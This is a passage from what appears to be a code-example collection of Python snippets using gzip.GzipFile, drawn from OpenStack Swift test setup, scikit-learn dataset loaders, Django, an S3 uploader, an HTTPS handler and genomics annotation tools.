    # We create the proxy server listening socket to get its port number so
    # that we can add it as the "auth_port" value for the functional test
    # clients.
    prolis = eventlet.listen(('localhost', 0))

    # The following set of configuration values is used both for the
    # functional test frame work and for the various proxy, account, container
    # and object servers.
    config.update({
        # Values needed by the various in-process swift servers
        'devices': _testdir,
        'swift_dir': _testdir,
        'mount_check': 'false',
        'client_timeout': '4',
        'allow_account_management': 'true',
        'account_autocreate': 'true',
        'allow_versions': 'True',
        # Below are values used by the functional test framework, as well as
        # by the various in-process swift servers
        'auth_host': '127.0.0.1',
        'auth_port': str(prolis.getsockname()[1]),
        'auth_ssl': 'no',
        'auth_prefix': '/auth/',
        # Primary functional test account (needs admin access to the
        # account)
        'account': 'test',
        'username': '******',
        'password': '******',
        # User on a second account (needs admin access to the account)
        'account2': 'test2',
        'username2': 'tester2',
        'password2': 'testing2',
        # User on same account as first, but without admin access
        'username3': 'tester3',
        'password3': 'testing3',
        # Service user and prefix (emulates glance, cinder, etc. user)
        'account5': 'test5',
        'username5': 'tester5',
        'password5': 'testing5',
        'service_prefix': 'SERVICE',
        # For tempauth middleware. Update reseller_prefix
        'reseller_prefix': 'AUTH, SERVICE',
        'SERVICE_require_group': 'service'
    })

    acc1lis = eventlet.listen(('localhost', 0))
    acc2lis = eventlet.listen(('localhost', 0))
    con1lis = eventlet.listen(('localhost', 0))
    con2lis = eventlet.listen(('localhost', 0))

    account_ring_path = os.path.join(_testdir, 'account.ring.gz')
    with closing(GzipFile(account_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
                          [{
                              'id': 0,
                              'zone': 0,
                              'device': 'sda1',
                              'ip': '127.0.0.1',
                              'port': acc1lis.getsockname()[1]
                          }, {
                              'id': 1,
                              'zone': 1,
                              'device': 'sdb1',
                              'ip': '127.0.0.1',
                              'port': acc2lis.getsockname()[1]
                          }], 30), f)
    container_ring_path = os.path.join(_testdir, 'container.ring.gz')
    with closing(GzipFile(container_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
                          [{
                              'id': 0,
                              'zone': 0,
                              'device': 'sda1',
                              'ip': '127.0.0.1',
                              'port': con1lis.getsockname()[1]
                          }, {
                              'id': 1,
                              'zone': 1,
                              'device': 'sdb1',
                              'ip': '127.0.0.1',
                              'port': con2lis.getsockname()[1]
                          }], 30), f)

    eventlet.wsgi.HttpProtocol.default_request_version = "HTTP/1.0"
    # Turn off logging requests by the underlying WSGI software.
    eventlet.wsgi.HttpProtocol.log_request = lambda *a: None
    logger = utils.get_logger(config, 'wsgi-server', log_route='wsgi')
    # Redirect logging other messages by the underlying WSGI software.
    eventlet.wsgi.HttpProtocol.log_message = \
        lambda s, f, *a: logger.error('ERROR WSGI: ' + f % a)
    # Default to only 4 seconds for in-process functional test runs
    eventlet.wsgi.WRITE_TIMEOUT = 4

    acc1srv = account_server.AccountController(config,
                                               logger=debug_logger('acct1'))
    acc2srv = account_server.AccountController(config,
                                               logger=debug_logger('acct2'))
    con1srv = container_server.ContainerController(
        config, logger=debug_logger('cont1'))
    con2srv = container_server.ContainerController(
        config, logger=debug_logger('cont2'))

    objsrvs = [(obj_sockets[index],
                the_object_server.ObjectController(config,
                                                   logger=debug_logger(
                                                       'obj%d' % (index + 1))))
               for index in range(len(obj_sockets))]

    logger = debug_logger('proxy')

    def get_logger(name, *args, **kwargs):
        return logger

    with mock.patch('swift.common.utils.get_logger', get_logger):
        with mock.patch('swift.common.middleware.memcache.MemcacheMiddleware',
                        FakeMemcacheMiddleware):
            try:
                app = loadapp(proxy_conf, global_conf=config)
            except Exception as e:
                raise InProcessException(e)

    nl = utils.NullLogger()
    prospa = eventlet.spawn(eventlet.wsgi.server, prolis, app, nl)
    acc1spa = eventlet.spawn(eventlet.wsgi.server, acc1lis, acc1srv, nl)
    acc2spa = eventlet.spawn(eventlet.wsgi.server, acc2lis, acc2srv, nl)
    con1spa = eventlet.spawn(eventlet.wsgi.server, con1lis, con1srv, nl)
    con2spa = eventlet.spawn(eventlet.wsgi.server, con2lis, con2srv, nl)

    objspa = [
        eventlet.spawn(eventlet.wsgi.server, objsrv[0], objsrv[1], nl)
        for objsrv in objsrvs
    ]

    global _test_coros
    _test_coros = \
        (prospa, acc1spa, acc2spa, con1spa, con2spa) + tuple(objspa)

    # Create accounts "test" and "test2"
    def create_account(act):
        ts = utils.normalize_timestamp(time())
        account_ring = Ring(_testdir, ring_name='account')
        partition, nodes = account_ring.get_nodes(act)
        for node in nodes:
            # Note: we are just using the http_connect method in the object
            # controller here to talk to the account server nodes.
            conn = swift.proxy.controllers.obj.http_connect(
                node['ip'], node['port'], node['device'], partition, 'PUT',
                '/' + act, {
                    'X-Timestamp': ts,
                    'x-trans-id': act
                })
            resp = conn.getresponse()
            assert (resp.status == 201)

    create_account('AUTH_test')
    create_account('AUTH_test2')
示例#17
0
def fetch_covtype(data_home=None,
                  download_if_missing=True,
                  random_state=None,
                  shuffle=False,
                  return_X_y=False):
    """Load the covertype dataset (classification).

    Download it if necessary.

    =================   ============
    Classes                        7
    Samples total             581012
    Dimensionality                54
    Features                     int
    =================   ============

    Read more in the :ref:`User Guide <covtype_dataset>`.

    Parameters
    ----------
    data_home : string, optional
        Specify another download and cache folder for the datasets. By default
        all scikit-learn data is stored in '~/scikit_learn_data' subfolders.

    download_if_missing : boolean, default=True
        If False, raise a IOError if the data is not locally available
        instead of trying to download the data from the source site.

    random_state : int, RandomState instance or None (default)
        Determines random number generation for dataset shuffling. Pass an int
        for reproducible output across multiple function calls.
        See :term:`Glossary <random_state>`.

    shuffle : bool, default=False
        Whether to shuffle dataset.

    return_X_y : boolean, default=False.
        If True, returns ``(data.data, data.target)`` instead of a Bunch
        object.

        .. versionadded:: 0.20

    Returns
    -------
    dataset : dict-like object with the following attributes:

    dataset.data : numpy array of shape (581012, 54)
        Each row corresponds to the 54 features in the dataset.

    dataset.target : numpy array of shape (581012,)
        Each value corresponds to one of the 7 forest covertypes with values
        ranging between 1 to 7.

    dataset.DESCR : string
        Description of the forest covertype dataset.

    (data, target) : tuple if ``return_X_y`` is True

        .. versionadded:: 0.20
    """

    data_home = get_data_home(data_home=data_home)
    covtype_dir = join(data_home, "covertype")
    samples_path = _pkl_filepath(covtype_dir, "samples")
    targets_path = _pkl_filepath(covtype_dir, "targets")
    available = exists(samples_path)

    if download_if_missing and not available:
        if not exists(covtype_dir):
            makedirs(covtype_dir)
        logger.info("Downloading %s" % ARCHIVE.url)

        archive_path = _fetch_remote(ARCHIVE, dirname=covtype_dir)
        Xy = np.genfromtxt(GzipFile(filename=archive_path), delimiter=',')
        # delete archive
        remove(archive_path)

        X = Xy[:, :-1]
        y = Xy[:, -1].astype(np.int32, copy=False)

        joblib.dump(X, samples_path, compress=9)
        joblib.dump(y, targets_path, compress=9)

    elif not available and not download_if_missing:
        raise IOError("Data not found and `download_if_missing` is False")
    try:
        X, y
    except NameError:
        X, y = _refresh_cache([samples_path, targets_path], 9)
        # TODO: Revert to the following two lines in v0.23
        # X = joblib.load(samples_path)
        # y = joblib.load(targets_path)

    if shuffle:
        ind = np.arange(X.shape[0])
        rng = check_random_state(random_state)
        rng.shuffle(ind)
        X = X[ind]
        y = y[ind]

    module_path = dirname(__file__)
    with open(join(module_path, 'descr', 'covtype.rst')) as rst_file:
        fdescr = rst_file.read()

    if return_X_y:
        return X, y

    return Bunch(data=X, target=y, DESCR=fdescr)
示例#18
0
文件: text.py 项目: zksfyz/django
def compress_string(s):
    zbuf = BytesIO()
    with GzipFile(mode='wb', compresslevel=6, fileobj=zbuf) as zfile:
        zfile.write(s)
    return zbuf.getvalue()
示例#19
0
def fetch_rcv1(data_home=None,
               subset='all',
               download_if_missing=True,
               random_state=None,
               shuffle=False):
    """Load the RCV1 multilabel dataset, downloading it if necessary.

    Version: RCV1-v2, vectors, full sets, topics multilabels.

    ==============     =====================
    Classes                              103
    Samples total                     804414
    Dimensionality                     47236
    Features           real, between 0 and 1
    ==============     =====================

    Read more in the :ref:`User Guide <datasets>`.

    Parameters
    ----------
    data_home : string, optional
        Specify another download and cache folder for the datasets. By default
        all scikit learn data is stored in '~/scikit_learn_data' subfolders.

    subset: string, 'train', 'test', or 'all', default='all'
        Select the dataset to load: 'train' for the training set
        (23149 samples), 'test' for the test set (781265 samples),
        'all' for both, with the training samples first if shuffle is False.
        This follows the official LYRL2004 chronological split.

    download_if_missing : boolean, default=True
        If False, raise a IOError if the data is not locally available
        instead of trying to download the data from the source site.

    random_state : int, RandomState instance or None, optional (default=None)
        Random state for shuffling the dataset.
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.

    shuffle : bool, default=False
        Whether to shuffle dataset.

    Returns
    -------
    dataset : dict-like object with the following attributes:

    dataset.data : scipy csr array, dtype np.float64, shape (804414, 47236)
        The array has 0.16% of non zero values.

    dataset.target : scipy csr array, dtype np.uint8, shape (804414, 103)
        Each sample has a value of 1 in its categories, and 0 in others.
        The array has 3.15% of non zero values.

    dataset.sample_id : numpy array, dtype np.uint32, shape (804414,)
        Identification number of each sample, as ordered in dataset.data.

    dataset.target_names : numpy array, dtype object, length (103)
        Names of each target (RCV1 topics), as ordered in dataset.target.

    dataset.DESCR : string
        Description of the RCV1 dataset.

    Reference
    ---------
    Lewis, D. D., Yang, Y., Rose, T. G., & Li, F. (2004). RCV1: A new
    benchmark collection for text categorization research. The Journal of
    Machine Learning Research, 5, 361-397.

    """
    N_SAMPLES = 804414
    N_FEATURES = 47236
    N_CATEGORIES = 103
    N_TRAIN = 23149

    data_home = get_data_home(data_home=data_home)
    rcv1_dir = join(data_home, "RCV1")
    if download_if_missing:
        makedirs(rcv1_dir, exist_ok=True)

    samples_path = join(rcv1_dir, "samples.pkl")
    sample_id_path = join(rcv1_dir, "sample_id.pkl")
    sample_topics_path = join(rcv1_dir, "sample_topics.pkl")
    topics_path = join(rcv1_dir, "topics_names.pkl")

    # load data (X) and sample_id
    if download_if_missing and (not exists(samples_path)
                                or not exists(sample_id_path)):
        file_urls = ["%s_test_pt%d.dat.gz" % (URL, i) for i in range(4)]
        file_urls.append("%s_train.dat.gz" % URL)
        files = []
        for file_url in file_urls:
            logger.warning("Downloading %s" % file_url)
            with closing(urlopen(file_url)) as online_file:
                # buffer the full file in memory to make possible to Gzip to
                # work correctly
                f = BytesIO(online_file.read())
            files.append(GzipFile(fileobj=f))

        Xy = load_svmlight_files(files, n_features=N_FEATURES)

        # Training data is before testing data
        X = sp.vstack([Xy[8], Xy[0], Xy[2], Xy[4], Xy[6]]).tocsr()
        sample_id = np.hstack((Xy[9], Xy[1], Xy[3], Xy[5], Xy[7]))
        sample_id = sample_id.astype(np.uint32)

        joblib.dump(X, samples_path, compress=9)
        joblib.dump(sample_id, sample_id_path, compress=9)

    else:
        X = joblib.load(samples_path)
        sample_id = joblib.load(sample_id_path)

    # load target (y), categories, and sample_id_bis
    if download_if_missing and (not exists(sample_topics_path)
                                or not exists(topics_path)):
        logger.warning("Downloading %s" % URL_topics)
        with closing(urlopen(URL_topics)) as online_topics:
            f = BytesIO(online_topics.read())

        # parse the target file
        n_cat = -1
        n_doc = -1
        doc_previous = -1
        y = np.zeros((N_SAMPLES, N_CATEGORIES), dtype=np.uint8)
        sample_id_bis = np.zeros(N_SAMPLES, dtype=np.int32)
        category_names = {}
        for line in GzipFile(fileobj=f, mode='rb'):
            line_components = line.decode("ascii").split(u" ")
            if len(line_components) == 3:
                cat, doc, _ = line_components
                if cat not in category_names:
                    n_cat += 1
                    category_names[cat] = n_cat

                doc = int(doc)
                if doc != doc_previous:
                    doc_previous = doc
                    n_doc += 1
                    sample_id_bis[n_doc] = doc
                y[n_doc, category_names[cat]] = 1

        # Samples in X are ordered with sample_id,
        # whereas in y, they are ordered with sample_id_bis.
        permutation = _find_permutation(sample_id_bis, sample_id)
        y = y[permutation, :]

        # save category names in a list, with same order than y
        categories = np.empty(N_CATEGORIES, dtype=object)
        for k in category_names.keys():
            categories[category_names[k]] = k

        # reorder categories in lexicographic order
        order = np.argsort(categories)
        categories = categories[order]
        y = sp.csr_matrix(y[:, order])

        joblib.dump(y, sample_topics_path, compress=9)
        joblib.dump(categories, topics_path, compress=9)

    else:
        y = joblib.load(sample_topics_path)
        categories = joblib.load(topics_path)

    if subset == 'all':
        pass
    elif subset == 'train':
        X = X[:N_TRAIN, :]
        y = y[:N_TRAIN, :]
        sample_id = sample_id[:N_TRAIN]
    elif subset == 'test':
        X = X[N_TRAIN:, :]
        y = y[N_TRAIN:, :]
        sample_id = sample_id[N_TRAIN:]
    else:
        raise ValueError("Unknown subset parameter. Got '%s' instead of one"
                         " of ('all', 'train', test')" % subset)

    if shuffle:
        X, y, sample_id = shuffle_(X, y, sample_id, random_state=random_state)

    return Bunch(data=X,
                 target=y,
                 sample_id=sample_id,
                 target_names=categories,
                 DESCR=__doc__)
示例#20
0
def putter(put, put_queue, stat_queue, options):
    logger = logging.getLogger(
        '%s[putter-%d]' %
        (os.path.basename(sys.argv[0]), current_process().pid))
    connection, bucket = None, None
    file_object_cache = FileObjectCache()
    # Figure out what content types we want to gzip
    if not options.gzip_type:  # default
        gzip_content_types = GZIP_CONTENT_TYPES
    elif 'all' in options.gzip_type:
        gzip_content_types = GZIP_ALL
    else:
        gzip_content_types = options.gzip_type
    if 'guess' in gzip_content_types:
        # don't bother removing 'guess' from the list since nothing will match it
        gzip_content_types.extend(GZIP_CONTENT_TYPES)
    if options.gzip:
        logger.debug('These content types will be gzipped: %s' %
                     unicode(gzip_content_types))
    while True:
        args = put_queue.get()
        if args is None:
            put_queue.task_done()
            break
        key_name, value_kwargs = args
        value = Value(file_object_cache, **value_kwargs)
        should_gzip = False
        try:
            if connection is None:
                connection = S3Connection(is_secure=options.secure,
                                          host=options.host)
            if bucket is None:
                bucket = connection.get_bucket(options.bucket)
            key = put(bucket, key_name, value)
            if key:
                if value.should_copy_content():
                    if options.headers:
                        headers = dict(
                            tuple(header.split(':', 1))
                            for header in options.headers)
                    else:
                        headers = {}

                    content_type = None
                    if options.content_type:
                        if options.content_type == 'guess':
                            content_type = mimetypes.guess_type(value.path)[0]
                        elif options.content_type == 'magic':
                            content_type = mimetypes.guess_type(value.path)[0]
                            if content_type is None:
                                content_type = magic.from_file(value.path,
                                                               mime=True)
                        else:
                            content_type = options.content_type
                        headers['Content-Type'] = content_type

                    content = value.get_content()
                    md5 = value.md5
                    should_gzip = options.gzip and (
                        content_type and content_type in gzip_content_types
                        or gzip_content_types == GZIP_ALL)
                    if should_gzip:
                        headers['Content-Encoding'] = 'gzip'
                        string_io = StringIO()
                        gzip_file = GzipFile(compresslevel=9,
                                             fileobj=string_io,
                                             mode='w')
                        gzip_file.write(content)
                        gzip_file.close()
                        content = string_io.getvalue()
                        md5 = compute_md5(StringIO(content))
                    if not options.dry_run:
                        key.set_contents_from_string(
                            content,
                            headers,
                            md5=md5,
                            policy=options.grant,
                            encrypt_key=options.encrypt_key)
                logger.info(
                    '%s %s> %s' %
                    (value.path, 'z' if should_gzip else '-', key.name))
                stat_queue.put(dict(size=value.get_size()))
            else:
                logger.info('skipping %s -> %s' % (value.path, key_name))
        except SSLError as exc:
            logger.error('%s -> %s (%s)' % (value.path, key_name, exc))
            put_queue.put(args)
            connection, bucket = None, None
        except IOError as exc:
            logger.error('%s -> %s (%s)' % (value.path, key_name, exc))
        put_queue.task_done()
示例#21
0
文件: HTTPS.py 项目: self20/Anomos
class HTTPSConnection(Dispatcher):
    def __init__(self, socket, getfunc):
        Dispatcher.__init__(self, socket)
        self.req = ''
        self.set_terminator('\n')
        self.getfunc = getfunc
        self.next_func = self.read_type

    ## HTTP handling methods ##
    def read_type(self, data):
        self.header = data.strip()
        words = data.split()
        if len(words) == 3:
            self.command, self.path, garbage = words
            self.pre1 = False
        elif len(words) == 2:
            self.command, self.path = words
            self.pre1 = True
            if self.command != 'GET':
                return None
        else:
            return None
        if self.command not in ('HEAD', 'GET'):
            return None
        self.headers = {}
        return self.read_header

    def read_header(self, data):
        data = data.strip()
        if data == '':
            # check for Accept-Encoding: header, pick a
            if self.headers.has_key('accept-encoding'):
                ae = self.headers['accept-encoding']
                log.debug("Got Accept-Encoding: " + ae + "\n")
            else:
                #identity assumed if no header
                ae = 'identity'
            # this eventually needs to support multple acceptable types
            # q-values and all that fancy HTTP crap
            # for now assume we're only communicating with our own client
            if ae.find('gzip') != -1:
                self.encoding = 'gzip'
            else:
                #default to identity.
                self.encoding = 'identity'
            r = self.getfunc(self, self.path, self.headers)
            if r is not None:
                self.answer(r)
                return None
        try:
            i = data.index(':')
        except ValueError:
            return None
        self.headers[data[:i].strip().lower()] = data[i+1:].strip()
        log.debug(data[:i].strip() + ": " + data[i+1:].strip())
        return self.read_header

    def answer(self, (responsecode, responsestring, headers, data)):
        if self.encoding == 'gzip':
            #transform data using gzip compression
            #this is nasty but i'm unsure of a better way at the moment
            compressed = StringIO()
            gz = GzipFile(fileobj = compressed, mode = 'wb', compresslevel = 9)
            gz.write(data)
            gz.close()
            compressed.seek(0,0)
            cdata = compressed.read()
            compressed.close()
            if len(cdata) >= len(data):
                self.encoding = 'identity'
            else:
                log.debug("Compressed: %i  Uncompressed: %i\n" % (len(cdata),len(data)))
                data = cdata
                headers['Content-Encoding'] = 'gzip'

        # i'm abusing the identd field here, but this should be ok
        if self.encoding == 'identity':
            ident = '-'
        else:
            ident = self.encoding
        username = '******'
        referer = self.headers.get('referer','-')
        useragent = self.headers.get('user-agent','-')
        timestamp = strftime("%d/%b/%Y:%H:%I:%S")
        log.info('%s %s %s [%s] "%s" %i %i "%s" "%s"' % (
                  self.socket.addr[0], ident, username, timestamp, self.header,
                  responsecode, len(data), referer, useragent))

        r = StringIO()
        r.write('HTTP/1.0 ' + str(responsecode) + ' ' + responsestring + '\r\n')
        if not self.pre1:
            headers['Content-Length'] = len(data)
            for key, value in headers.items():
                r.write(key + ': ' + str(value) + '\r\n')
            r.write('\r\n')
        if self.command != 'HEAD':
            r.write(data)

        self.push(r.getvalue())
        self.close_when_done()
示例#22
0
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 31 11:45:12 2017

@author: jabong
"""

import numpy as np
from collections import defaultdict
from itertools import chain
from gzip import GzipFile

minsupport = 80

dataset = [[int(tok) for tok in line.strip().split()]
             for line in GzipFile('data/retail.dat.gz')]

counts = defaultdict(int)
for elem in chain(*dataset):
    counts[elem] += 1

valid = set(el for el,c in counts.items() if (c >= minsupport))
dataset = [[el for el in ds if (el in valid)] for ds in dataset]
dataset = [frozenset(ds) for ds in dataset]

itemsets = [frozenset([v]) for v in valid]
freqsets = itemsets[:]
for i in range(16):
    print("At iteration {}, number of frequent buskets: {}".format(i, len(itemsets)))
    nextsets = []
    tested = set()
示例#23
0
def _in_process_setup_ring(swift_conf, conf_src_dir, testdir):
    """
    If SWIFT_TEST_POLICY is set:
    - look in swift.conf file for specified policy
    - move this to be policy-0 but preserving its options
    - copy its ring file to test dir, changing its devices to suit
      in process testing, and renaming it to suit policy-0
    Otherwise, create a default ring file.
    """
    conf = ConfigParser()
    conf.read(swift_conf)
    sp_prefix = 'storage-policy:'

    try:
        # policy index 0 will be created if no policy exists in conf
        policies = parse_storage_policies(conf)
    except PolicyError as e:
        raise InProcessException(e)

    # clear all policies from test swift.conf before adding test policy back
    for policy in policies:
        conf.remove_section(sp_prefix + str(policy.idx))

    if policy_specified:
        policy_to_test = policies.get_by_name(policy_specified)
        if policy_to_test is None:
            raise InProcessException('Failed to find policy name "%s"' %
                                     policy_specified)
        _info('Using specified policy %s' % policy_to_test.name)
    else:
        policy_to_test = policies.default
        _info('Defaulting to policy %s' % policy_to_test.name)

    # make policy_to_test be policy index 0 and default for the test config
    sp_zero_section = sp_prefix + '0'
    conf.add_section(sp_zero_section)
    for (k, v) in policy_to_test.get_info(config=True).items():
        conf.set(sp_zero_section, k, v)
    conf.set(sp_zero_section, 'default', True)

    with open(swift_conf, 'w') as fp:
        conf.write(fp)

    # look for a source ring file
    ring_file_src = ring_file_test = 'object.ring.gz'
    if policy_to_test.idx:
        ring_file_src = 'object-%s.ring.gz' % policy_to_test.idx
    try:
        ring_file_src = _in_process_find_conf_file(conf_src_dir,
                                                   ring_file_src,
                                                   use_sample=False)
    except InProcessException as e:
        if policy_specified:
            raise InProcessException('Failed to find ring file %s' %
                                     ring_file_src)
        ring_file_src = None

    ring_file_test = os.path.join(testdir, ring_file_test)
    if ring_file_src:
        # copy source ring file to a policy-0 test ring file, re-homing servers
        _info('Using source ring file %s' % ring_file_src)
        ring_data = ring.RingData.load(ring_file_src)
        obj_sockets = []
        for dev in ring_data.devs:
            device = 'sd%c1' % chr(len(obj_sockets) + ord('a'))
            utils.mkdirs(os.path.join(_testdir, 'sda1'))
            utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp'))
            obj_socket = listen_zero()
            obj_sockets.append(obj_socket)
            dev['port'] = obj_socket.getsockname()[1]
            dev['ip'] = '127.0.0.1'
            dev['device'] = device
            dev['replication_port'] = dev['port']
            dev['replication_ip'] = dev['ip']
        ring_data.save(ring_file_test)
    else:
        # make default test ring, 3 replicas, 4 partitions, 3 devices
        # which will work for a replication policy or a 2+1 EC policy
        _info('No source object ring file, creating 3rep/4part/3dev ring')
        obj_sockets = [listen_zero() for _ in (0, 1, 2)]
        replica2part2dev_id = [[0, 1, 2, 0], [1, 2, 0, 1], [2, 0, 1, 2]]
        devs = [{
            'id': 0,
            'zone': 0,
            'device': 'sda1',
            'ip': '127.0.0.1',
            'port': obj_sockets[0].getsockname()[1]
        }, {
            'id': 1,
            'zone': 1,
            'device': 'sdb1',
            'ip': '127.0.0.1',
            'port': obj_sockets[1].getsockname()[1]
        }, {
            'id': 2,
            'zone': 2,
            'device': 'sdc1',
            'ip': '127.0.0.1',
            'port': obj_sockets[2].getsockname()[1]
        }]
        ring_data = ring.RingData(replica2part2dev_id, devs, 30)
        with closing(GzipFile(ring_file_test, 'wb')) as f:
            pickle.dump(ring_data, f)

    for dev in ring_data.devs:
        _debug('Ring file dev: %s' % dev)

    return obj_sockets
 def uncompress(self, sitemapdata):
     sio = StringIO(sitemapdata)
     unziped = GzipFile(fileobj=sio)
     xml = unziped.read()
     unziped.close()
     return xml
示例#25
0
def gzip_reader(fd, size, url, params):
    """Wraps the input in a :class:`gzip.GzipFile` object."""
    from gzip import GzipFile
    return GzipFile(fileobj=fd), size, url
示例#26
0
def annotatebins(bins, outfile, include_chroms, ranges, track, ucsc_track,
                 actions, track_names, track_list, ucsc_list, ucsc_ref, fasta,
                 snv_mus, no_ucsc_chromsplit, maxfloat, bgzip, quiet):
    """
    Annotate bins
    """

    # Sanitize & format inputs
    ucsc_chromsplit = not no_ucsc_chromsplit
    track = list(track)
    ucsc_track = list(ucsc_track)
    actions = tuple([a.lower() for a in actions])

    # Parse file with lists of tracks (if provided) and add to track lists
    if track_list is not None:
        supp_tracks, supp_actions, supp_names = mutrate.parse_track_file(
            track_list)
        track = track + supp_tracks
        n_ucsc_tracks = len(ucsc_track)
        if n_ucsc_tracks > 0:
            actions = tuple(list(actions[:n_ucsc_tracks]) + supp_actions \
                            + list(actions[n_ucsc_tracks:]))
            track_names = tuple(list(track_names[:n_ucsc_tracks]) + supp_names \
                            + list(track_names[n_ucsc_tracks:]))
        else:
            actions = tuple(list(actions) + supp_actions)
            track_names = tuple(list(track_names) + supp_names)

    # Parse file with list of UCSC tracks (if provided and add to track lists)
    if ucsc_list is not None:
        supp_ucsc_tracks, supp_ucsc_actions, supp_ucsc_names = mutrate.parse_track_file(
            ucsc_list)
        ucsc_track = ucsc_track + supp_ucsc_tracks
        actions = tuple(list(actions) + supp_ucsc_actions)
        track_names = tuple(list(track_names) + supp_ucsc_names)

    # Handle header reformatting
    n_tracks = len(track) + len(ucsc_track)
    if n_tracks != len(track_names):
        err = 'INPUT ERROR: Number of supplied track names ({0}) does not ' + \
              'match number of tracks ({1}).'
        exit(err.format(len(track_names), n_tracks))
    if 'compressed' in determine_filetype(bins):
        header = GzipFile(bins).readline().decode('utf-8').rstrip()
    else:
        header = open(bins, 'r').readline().rstrip()
    if not header.startswith('#'):
        status_msg = '[{0}] athena annotate-bins: No header line detected. ' + \
                     'Adding default header.'
        print(status_msg.format(
            datetime.now().strftime('%b %d %Y @ %H:%M:%S')))
        n_extra_cols = len(header.split('\t')) - 3
        header = make_default_bed_header(n_extra_cols)
    newheader = header + '\t' + '\t'.join(list(track_names))
    if fasta is not None:
        newheader = '\t'.join([newheader, 'pct_gc'])
        if snv_mus is not None:
            newheader = '\t'.join([newheader, 'snv_mu'])

    # Annotate bins
    newbins = mutrate.annotate_bins(bins, include_chroms, ranges, track,
                                    ucsc_track, ucsc_ref, actions, fasta,
                                    snv_mus, maxfloat, ucsc_chromsplit, quiet)

    # Save annotated bins
    if 'compressed' in determine_filetype(outfile):
        outfile = path.splitext(outfile)[0]
    newbins.saveas(outfile, trackline=newheader)

    # Bgzip bins, if optioned
    if bgzip:
        bgz(outfile)
def gzip(data):
    buff = BytesIO(data)
    f = GzipFile(fileobj=buff)

    return f.read().decode('utf-8')
示例#28
0
def annotatepairs(pairs, outfile, chroms, ranges, track, ucsc_track, actions,
                  track_names, track_list, ucsc_list, ucsc_ref, fasta, binsize,
                  homology_cutoffs, no_ucsc_chromsplit, maxfloat, bgzip,
                  quiet):
    """
    Annotate pairs
    """

    # Sanitize & format inputs
    ucsc_chromsplit = not no_ucsc_chromsplit
    tracks = list(track)
    ucsc_tracks = list(ucsc_track)
    actions = tuple([a.lower() for a in actions])
    if len(homology_cutoffs) > 0:
        homology_cutoffs = list(homology_cutoffs)
    else:
        homology_cutoffs = [1.0]

    # Parse file with lists of tracks (if provided) and add to track lists
    if track_list is not None:
        supp_tracks, supp_actions, supp_names = mutrate.parse_track_file(
            track_list)
        tracks = tracks + supp_tracks
        n_ucsc_tracks = len(ucsc_tracks)
        if n_ucsc_tracks > 0:
            actions = tuple(list(actions[:n_ucsc_tracks]) + supp_actions \
                            + list(actions[n_ucsc_tracks:]))
            track_names = tuple(list(track_names[:n_ucsc_tracks]) + supp_names \
                            + list(track_names[n_ucsc_tracks:]))
        else:
            actions = tuple(list(actions) + supp_actions)
            track_names = tuple(list(track_names) + supp_names)

    # Parse file with list of UCSC tracks (if provided and add to track lists)
    if ucsc_list is not None:
        supp_ucsc_tracks, supp_ucsc_actions, supp_ucsc_names = mutrate.parse_track_file(
            ucsc_list)
        ucsc_tracks = ucsc_tracks + supp_ucsc_tracks
        actions = tuple(list(actions) + supp_ucsc_actions)
        track_names = tuple(list(track_names) + supp_ucsc_names)

    # Handle header reformatting
    if 'compressed' in determine_filetype(pairs):
        header = GzipFile(pairs).readline().decode('utf-8').rstrip()
    else:
        header = open(pairs, 'r').readline().rstrip()
    if not header.startswith('#'):
        msg = 'INPUT WARNING: '
        status_msg = '[{0}] athena annotate-pairs: No header line detected. ' + \
                     'Adding default header.'
        print(status_msg.format(
            datetime.now().strftime('%b %d %Y @ %H:%M:%S')))
        n_extra_cols = len(header.split('\t')) - 3
        header = make_default_bed_header(n_extra_cols)
    if len(track_names) > 0:
        newheader = header + '\t' + '\t'.join(list(track_names))
    else:
        newheader = header
    if fasta is not None:
        for k in homology_cutoffs:
            for direction in 'fwd rev'.split():
                newheader += '\t' + 'longest_{}_kmer_{}pct_identity'.format(
                    direction, int(round(100 * k)))

    # Annotate pairs
    newpairs = mutrate.annotate_pairs(pairs, chroms, ranges, tracks,
                                      ucsc_tracks, actions, track_names,
                                      ucsc_ref, fasta, binsize,
                                      homology_cutoffs, ucsc_chromsplit,
                                      maxfloat, quiet)

    # Save annotated bins
    if 'compressed' in determine_filetype(outfile):
        outfile = path.splitext(outfile)[0]
    newpairs.saveas(outfile, trackline=newheader)

    # Bgzip bins, if optioned
    if bgzip:
        bgz(outfile)
示例#29
0
def compress_string(s):
    zbuf = BytesIO()
    zfile = GzipFile(mode='wb', compresslevel=6, fileobj=zbuf)
    zfile.write(s)
    zfile.close()
    return zbuf.getvalue()
示例#30
0
def open_file(fname):
    if fname.endswith('.gz'):
        return GzipFile(fname)
    else:
        return file(fname)